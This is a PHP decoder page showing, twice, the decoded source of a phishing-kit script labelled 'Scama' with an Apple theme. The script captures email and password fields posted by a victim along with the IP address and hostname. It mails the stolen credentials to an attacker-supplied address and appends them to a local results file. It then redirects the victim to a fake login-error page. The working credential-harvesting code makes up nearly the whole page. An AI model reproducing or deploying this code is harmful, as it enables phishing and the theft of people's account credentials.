Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php /// Scama By Anonisma Edited By Fb.com/Noureddine.Boumadyen $ip = getenv("REMOTE..
Decoded Output download
<?php
/// Scama By Anonisma Edited By Fb.com/Noureddine.Boumadyen
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message .= "|----------+| Login Infos |+--------------|
";
$message .= "|Email : ".$_POST['1995']."
";
$message .= "|PassWord : ".$_POST['19955']."
";
$message .= "|----------+| IP infos |+--------------|
";
$message .= "|Client IP: ".$ip."
";
$message .= "|HostName : ".$hostname."
";
$message .= "|--- http://www.geoiptool.com/?IP=$ip ----
";
$message .= "|----------| End |--------------|
";
$subject = "LOG APPLE!! $ip";
$send = "[email protected]"; // <=== Put Your Email Here
mail("$send", "$subject", $message);
$f = fopen("./resultados.txt", "a"); // ila waslat chi haja khawya dkhol : ./enviar-resultados-a-mi-email/resultados.txt ===> tal9a result maktouba
fwrite($f, $message);
?>
<html>
<script language="javascript">
var page = "../web-eror-login.php"
top.location = page;
</script>
</html>
Did this file decode correctly?
Original Code
<?php
/// Scama By Anonisma Edited By Fb.com/Noureddine.Boumadyen
$ip = getenv("REMOTE_ADDR");
$hostname = gethostbyaddr($ip);
$message .= "|----------+| Login Infos |+--------------|\n";
$message .= "|Email : ".$_POST['1995']."\n";
$message .= "|PassWord : ".$_POST['19955']."\n";
$message .= "|----------+| IP infos |+--------------|\n";
$message .= "|Client IP: ".$ip."\n";
$message .= "|HostName : ".$hostname."\n";
$message .= "|--- http://www.geoiptool.com/?IP=$ip ----\n";
$message .= "|----------| End |--------------|\n";
$subject = "LOG APPLE!! $ip";
$send = "[email protected]"; // <=== Put Your Email Here
mail("$send", "$subject", $message);
$f = fopen("./resultados.txt", "a"); // ila waslat chi haja khawya dkhol : ./enviar-resultados-a-mi-email/resultados.txt ===> tal9a result maktouba
fwrite($f, $message);
?>
<html>
<script language="javascript">
var page = "../web-eror-login.php"
top.location = page;
</script>
</html>
Function Calls
| getenv | 1 |
Stats
| MD5 | 09dd571b1257f2a39c48b7f2e824563d |
| Eval Count | 0 |
| Decode Time | 101 ms |